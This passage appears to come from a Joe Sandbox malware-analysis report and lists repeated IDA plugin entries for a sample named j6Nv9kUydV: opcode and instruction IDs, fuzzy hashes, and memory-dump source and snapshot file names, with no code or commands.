                                                        • Opcode ID: 87a51e9a53dfcde531e502f636a27fc9ee04fa5d09a2a03bed13b243e959aacf
                                                        • Instruction ID: 7715f3863aa071c65fa915c508fe23021fba396a89076eae72bb2e3d32d0ffff
                                                        • Opcode Fuzzy Hash: 87a51e9a53dfcde531e502f636a27fc9ee04fa5d09a2a03bed13b243e959aacf
                                                        • Instruction Fuzzy Hash: 4A41B2EB96C115BC7102C6856B64AFF676EE2D7330F30871AF823D5601E2950F89D139
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11089d60da3066e4b469bbb7abda70df959c916d8ad21c0d00ff3fad03aa1e5e
                                                        • Instruction ID: 0235cb9969d8ff689b0a9b0ef84347f7225a905d566ab38486adb33a98bc80c1
                                                        • Opcode Fuzzy Hash: 11089d60da3066e4b469bbb7abda70df959c916d8ad21c0d00ff3fad03aa1e5e
                                                        • Instruction Fuzzy Hash: 2D311AF786C114BDA24286955A50AFE7B7EE6C7330F30872AF423D6601D2950F49C239
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d1b2fcb6a7a10e73da6c2e5b31be364bf4afa210ad42f9f521bf39083c4f7df
                                                        • Instruction ID: 1e205ff88ec74d9613969251ad4e151df89538eb39d9a2460d48286c34d15c86
                                                        • Opcode Fuzzy Hash: 8d1b2fcb6a7a10e73da6c2e5b31be364bf4afa210ad42f9f521bf39083c4f7df
                                                        • Instruction Fuzzy Hash: D411D5EB298230BDF10684955B54BF65B5EE3CB730F328227F503C4986F385466A3171
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 95825c51dd20a7ac0c229188539b56dd5dbaaed83ca9be6b57b209a35669c99c
                                                        • Instruction ID: a6c03697fa9dc08c6a4a337ad1c9a6898a1f94b4bb2bca0619845d9523d936af
                                                        • Opcode Fuzzy Hash: 95825c51dd20a7ac0c229188539b56dd5dbaaed83ca9be6b57b209a35669c99c
                                                        • Instruction Fuzzy Hash: F821F6E6C7C105FD914686985AA4BFE7B6EE297334F308316F8379A701D2611B85C23D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8a355338c3ea7576a1400d28e71a2c995be27ea662855c590ae1e3309777d9bb
                                                        • Instruction ID: 015ea9f5105969e01962a45d75524aaac4632d4316a17fd0a0aa49aad7b04f42
                                                        • Opcode Fuzzy Hash: 8a355338c3ea7576a1400d28e71a2c995be27ea662855c590ae1e3309777d9bb
                                                        • Instruction Fuzzy Hash: 582105E6C7C109FD95018A989A90BFE676EA797334F308706F4339A702D3615B45C27D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 904c388d154bd9db69ae75e6e18d02d8289afa0d5eb4daad29ed1f9f4a6a6c8d
                                                        • Instruction ID: 49fb48eb9f13e6361e7d5da57e77231bd8226c50c6d91c15f37f9788cb30d461
                                                        • Opcode Fuzzy Hash: 904c388d154bd9db69ae75e6e18d02d8289afa0d5eb4daad29ed1f9f4a6a6c8d
                                                        • Instruction Fuzzy Hash: 4B2105E6C2D105FD924286985A90BFF7B3EA687334F308306F833AA642D2615B45C279
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e13330233700f0acd8ed06e360db607a4e6634ffaa17042ea4ddc8c6e369de7
                                                        • Instruction ID: 4d91b41482c5786306c7764b73746c5e04e793b862fb666d21974bbcdffe82ff
                                                        • Opcode Fuzzy Hash: 7e13330233700f0acd8ed06e360db607a4e6634ffaa17042ea4ddc8c6e369de7
                                                        • Instruction Fuzzy Hash: 611106EB298230BDF10644955A54BF66A5EE3CB330F328227F403C5982E384866E3171
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fd6b0f1a584c6e554abb55a9c1d1933898a9d2639c289e050adddc6f9dbe1b00
                                                        • Instruction ID: 467d9d1df60817cc5b2238824b44d6df47b1c5483393531a403aba57f7ec7fda
                                                        • Opcode Fuzzy Hash: fd6b0f1a584c6e554abb55a9c1d1933898a9d2639c289e050adddc6f9dbe1b00
                                                        • Instruction Fuzzy Hash: F51101E6C6C008FD920186889A90BFF762EA29B334F308716F833A6641D3A05B44C239
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1a98d67d0ca0d09d3d8222130e1ee16d2d7499b2c26bf318e1330db2578f8a23
                                                        • Instruction ID: 6678d9b32e52ad3a8dc662680f5412fe47e48121525126187c15f9d6ec4f4c1e
                                                        • Opcode Fuzzy Hash: 1a98d67d0ca0d09d3d8222130e1ee16d2d7499b2c26bf318e1330db2578f8a23
                                                        • Instruction Fuzzy Hash: EB010CEB298230BDE60A55D84644BF56B5FF74F330F324226F50795A82F3D4866A3160
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 687eb9c1258e0cc24fa84e4034b276c11892374f6829894ab2b4b8509c35e614
                                                        • Instruction ID: 45a223b76c59f93c107a7885f201c62c08604eb1203def4bc02161ee9b9a5864
                                                        • Opcode Fuzzy Hash: 687eb9c1258e0cc24fa84e4034b276c11892374f6829894ab2b4b8509c35e614
                                                        • Instruction Fuzzy Hash: 9F11DCF754C3B0FED70B45A441845F57FAAEE4F330B3142ABE4468A986E344432B6362
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 738ec26672d5e38b003b060d7d870519adc59dfea78b769bee21d54a14352b68
                                                        • Instruction ID: 604e217168a97c13da9ba44af5b726a017e3cc2f4047b993d7b2286788683f04
                                                        • Opcode Fuzzy Hash: 738ec26672d5e38b003b060d7d870519adc59dfea78b769bee21d54a14352b68
                                                        • Instruction Fuzzy Hash: A51108E6C2C004EED24687989690BFE7B2EA797334F30875AF833A6642D2511F45C269
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e4107a77d15d56688de953ff1e239ee1315ef916e27fad8b22926684f4c1e9d
                                                        • Instruction ID: b7c9e5539cc21c9d89e6eb983808bd58fd8df4f74a65d90271a379d64dce393d
                                                        • Opcode Fuzzy Hash: 7e4107a77d15d56688de953ff1e239ee1315ef916e27fad8b22926684f4c1e9d
                                                        • Instruction Fuzzy Hash: 651125F1C28108EEC2419A9486907FE767FA757230F308329E82357642E3611B44C159
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0af026f607037786e5a1d6f996d4a4bddc05c5c08816f933189e3bc613c4bba7
                                                        • Instruction ID: 4fcdf69019e695bb4b28e6bbe5abd8c9b8d38a4a7cbc440029c147c0bb3049e1
                                                        • Opcode Fuzzy Hash: 0af026f607037786e5a1d6f996d4a4bddc05c5c08816f933189e3bc613c4bba7
                                                        • Instruction Fuzzy Hash: AB11EBE714C360FDD70A45B442846F56FAABB8F330B32026BF04789A83E344462B6362
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5afef8ba765173bba7224b866df732b647371dcfd79193dce0285d35f9afe641
                                                        • Instruction ID: bbb61fec716d1ac2c8f608ccdca784ac7995568a6d8cafe278da691165b2b818
                                                        • Opcode Fuzzy Hash: 5afef8ba765173bba7224b866df732b647371dcfd79193dce0285d35f9afe641
                                                        • Instruction Fuzzy Hash: 640147EB15C230FDD34A59A44284AF66F6EA64F330F234227F40785982E39987AA3161
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 56a216d2080b6c11daae63d0c843bee2a1ecc1fc439de9b6c176642fb651da7b
                                                        • Instruction ID: 9a609c8b10c2f917e87cdb6711969e5e3ed708dd4c3d0a67d40f6925baeaadc6
                                                        • Opcode Fuzzy Hash: 56a216d2080b6c11daae63d0c843bee2a1ecc1fc439de9b6c176642fb651da7b
                                                        • Instruction Fuzzy Hash: EE0126F5C7C005DDD2018B449650BFE673EA757234F308706E837A6102D2614F81C56D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10c7a93482f781e82f7d71f6aeee201089509da3be14e66c86d32b828cf35cd9
                                                        • Instruction ID: fc1a23d239e7dba3ed9bf43e7f4b2c582e108ffaf7fd407d9dc86cafe2df4a03
                                                        • Opcode Fuzzy Hash: 10c7a93482f781e82f7d71f6aeee201089509da3be14e66c86d32b828cf35cd9
                                                        • Instruction Fuzzy Hash: F601D1F5C6C105EED2028B548A50BFE673EA76B334F308715E837A7142D2A11F81C16A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abef9eb17c41ca1aaa9cda206413704a396cd7bb7a2a9e5211327273e49c0290
                                                        • Instruction ID: 8e7e6b429403217932b2f97c2a6d44bacd96de804856e87507f8269007f58a9d
                                                        • Opcode Fuzzy Hash: abef9eb17c41ca1aaa9cda206413704a396cd7bb7a2a9e5211327273e49c0290
                                                        • Instruction Fuzzy Hash: 25F07DE7188230EDD74994E482846F65A6FE68F330B324317E00784596F344466D31A0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 307ff8b97b0baf4c79f040aa426a4f78a1bd5948bc40d880c9fe895db5fb67da
                                                        • Instruction ID: 29234acc44de3e7c080da266c554381c8cbe042be43637143e106232dbac093c
                                                        • Opcode Fuzzy Hash: 307ff8b97b0baf4c79f040aa426a4f78a1bd5948bc40d880c9fe895db5fb67da
                                                        • Instruction Fuzzy Hash: FBF046EA144320AED70958F48B447E7ABAEB79F330F324627F01791585E3A4065E62A0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 203e5e0a7ab2cb1258af70c05b5c93cca470017154f80d4523e71dc1ef7c9756
                                                        • Instruction ID: fdb9345a8248702fb467a6ec4e99a8432c92d76d06429fcd26210e8bed7200df
                                                        • Opcode Fuzzy Hash: 203e5e0a7ab2cb1258af70c05b5c93cca470017154f80d4523e71dc1ef7c9756
                                                        • Instruction Fuzzy Hash: 27F04CEB548230ADD34A98E48684AFA5F5FE69F330B334227F00784945F354466E31B0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 84b840b0cf448e69b1bb6437781b6f10d8b82782e2fdfefd59b71f15cbfa8534
                                                        • Instruction ID: 3beb66913d4058cbe7083c76a9215fae7975315dec709df8c8116ffc8af0e5af
                                                        • Opcode Fuzzy Hash: 84b840b0cf448e69b1bb6437781b6f10d8b82782e2fdfefd59b71f15cbfa8534
                                                        • Instruction Fuzzy Hash: 5301D4F582C249DEC3068B98C690BFE7B3AAB5B324F34875AE86257146C3615E50C369
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2b7acdf241fcd88f266457eaaf38860f118d08c891b35b252d091b94572411c9
                                                        • Instruction ID: 301edf455ca52e5220bf4e57a7328b03a55972a6122a90c8d835121ace02775d
                                                        • Opcode Fuzzy Hash: 2b7acdf241fcd88f266457eaaf38860f118d08c891b35b252d091b94572411c9
                                                        • Instruction Fuzzy Hash: 15F02BEB088230ADD74955A587446F69E5FB75F330B324227F00780646E354466E3170
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2bb8c495c0653f9f3a73d79018e190d58d5cf98a26fda79cb962a9fcfe58ce8f
                                                        • Instruction ID: d5dc6e4a73d4b580f39b3de2505d331090e4fb929c087f69563e0437dcc87171
                                                        • Opcode Fuzzy Hash: 2bb8c495c0653f9f3a73d79018e190d58d5cf98a26fda79cb962a9fcfe58ce8f
                                                        • Instruction Fuzzy Hash: 4D0126F182C205DEC3028B54C6507FD3B3AA767234F31878AE86356102C3611F40C329
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 81dd1fe237d433653a4418042f770777853b8ac555c7285da0883cb2de5af204
                                                        • Instruction ID: f00ab738ef5476766bfb370b8aebefe3caa74909b848edc81f11bc6163c26e6e
                                                        • Opcode Fuzzy Hash: 81dd1fe237d433653a4418042f770777853b8ac555c7285da0883cb2de5af204
                                                        • Instruction Fuzzy Hash: A7F028F4C2C109EDD301CB548994BFE3B3DDA9B330F318B5AE8729A011C2114F52C1AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd